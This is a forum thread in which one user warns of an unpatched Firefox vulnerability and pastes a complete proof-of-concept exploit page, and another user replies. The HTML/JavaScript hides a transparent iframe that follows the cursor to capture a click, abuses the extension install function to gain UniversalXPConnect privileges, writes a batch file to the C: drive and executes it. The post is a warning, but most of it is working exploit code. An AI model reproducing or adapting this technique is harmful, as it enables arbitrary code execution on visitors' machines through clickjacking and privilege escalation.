• Ever thought it'd be cool to have your art, writing, or challenge runs featured on PokéCommunity? Click here for info - we'd love to spotlight your work!
  • Welcome to PokéCommunity! Register now and join one of the best fan communities on the 'net to talk Pokémon and more! We are not affiliated with The Pokémon Company or Nintendo.

Mozilla Firefox 0day Vulnerability

DarkMew

Dark Sith Lord
  • 80
    Posts
    20
    Years
    Watch out for this newly discovered Firefox vulnerability.
    It is called "0day", the Mozilla people are working to fix it.
    This is how it works:
    When a user clicks inside a specially crafted web page, the browser
    will make a malicious batch file and execute it.
    Here is example code:
    -----------0day_example.html-------------------------
    // FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
    // If a user clicks anywhere on a specially crafted page, this code will
    // automatically create and execute a malicious batch/exe file.
    //
    // Update (08.05.2005) - The Mozilla Foundation patched (partially) this
    // issue on the server side by adding random letters and numbers to the
    // install function, which will prevent this exploit from working.

    <html><head><title>firefox 0day exploit</title>

    <body>Click anywhere inside this page<br>
    <br>Advisory - https://www.frsirt.com/english/advisories/2005/0493<br>
    <iframe onload="loader()" src="javascript:'<noscript>'+eval('if

    (window.name!=\'stealcookies\')
    {window.name=\'stealcookies\';} else{ event={target:

    {href:\'https://ftp.mozilla.org/pub/
    mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install

    (event,\'You are
    vulnerable!!!\',\'javascript:eval

    (\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
    UniversalXPConnect\\\\\\\');file=Components.classes

    [\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
    createInstance(Components.interfaces.nsILocalFile);file.initWithPath

    (\\\\\\\'c:\\\\\\\\\\\\\\\\
    booom.bat\\\\\\\');file.createUnique

    (Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
    outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-

    stream;1\\\\\\\'].
    createInstance

    (Components.interfaces.nsIFileOutputStream);outputStream.init

    (file,0x04|0x08
    |0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious

    commands here...
    \\\\\\\\nPAUSE\\\\\\\';outputStream.write

    (output,output.length);outputStream.close();file.launch();
    \\\')\'); }')+'</noscript><a

    href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
    id=220&application=firefox\'

    style=\'cursor:default;\'>   </'+'a>'"
    id="targetframe" scrolling="no" frameborder="0" marginwidth="0"

    marginheight=0" style=
    "position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;

    padding:0px;
    -moz-opacity:0"></iframe>


    <script language="JavaScript" type="text/javascript">

    document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
    }

    var counter = 0;
    function loader() {
    counter++
    if(counter == 1) {
    stealcookies.focus()
    } else if(counter == 2) {
    stealcookies.history.go(-1)
    //targetframe.style.display="none";
    }
    }
    </script>
    </body>
    </html>
    ---------------------------end-------------------------------------
    This bug will probably be fixed soon.
     
    Whoa, that's interesting but I'm sure FF will find a solution for this bug very soon. Anyway what exactly does this bug do or what does the batch or exe file do.

    ~ CC
     
    Back
    Top